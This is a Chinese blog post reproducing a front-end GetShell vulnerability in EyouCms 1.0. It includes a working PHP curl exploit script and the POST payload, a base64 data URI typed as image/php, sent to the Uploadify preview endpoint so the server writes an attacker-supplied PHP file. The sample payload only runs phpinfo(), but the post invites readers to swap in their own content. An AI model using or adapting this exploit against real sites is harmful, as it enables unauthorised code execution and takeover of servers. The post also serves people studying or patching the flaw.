您所在的位置:首页 > web漏洞 >EyouCms1.0前台GetShell漏洞复现(附带脚本)

EyouCms1.0前台GetShell漏洞复现(附带脚本)

xise官网
xise xise
2019-02-06 16:24:31 阅读 6541

利用脚本

<?php
//EyouCms-V1.0 
//GetShell漏洞检测  

function request_post($url = '', $param = '')
{
	if(empty($url) || empty($param))
	{
		return false;
	}
	
	$postUrl = $url;
	$curlPost = $param;
	$ch = curl_init();	//初始化curl
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);	//捕获内容,但不输出
	curl_setopt($ch, CURLOPT_URL, $postUrl);	//抓取指定网页
	curl_setopt($ch, CURLOPT_HEADER, 0);	//设置header
	curl_setopt($ch, CURLOPT_POST, 1);	//post提交方式
	curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);
	$data = curl_exec($ch);	//运行curl
	$return_content = curl_multi_getcontent($ch);	//获取输出的文本流
	
	return $return_content;
}

$return_content = request_post("http://127.0.0.1/index.php/api/Uploadify/preview", "data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==");
echo $return_content;
?>
//替换request_post里面的内容即可

漏洞复现

poc地址: /index.php/api/Uploadify/preview

CBS{W[B8@~2GN($@}BFY681.png


检测是否存在漏洞


{MZ{0{_$6SLGFD2]Z1`8{KQ.png



显示这个说明存在漏洞


Post Data内容:data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==

提交Post Data内容,访问以后。


P{]M_F0ENN`[L$4SU}D`HDX.png


漏洞复现成功截图


 

© 著作权归作者所有
下一篇: dedecms最新漏洞
下一篇:暂无信息
xise简介
xise 创始人
7年计算机项目开发经验,拥有5年计算机教学经验,擅长大型软件项目系统架构与开发。
评论信息
我要评论
关注:6541+
2019-02-06
关注:54+
2019-02-03
关注:649+
2019-02-03
关注:5465+
2019-02-03
关注:646+
2019-02-03
关注:6541+
2019-02-06
关注:54+
2019-02-03
关注:649+
2019-02-03
关注:5465+
2019-02-03
关注:646+
2019-02-03
友情链接:
  • 没有资料
  • |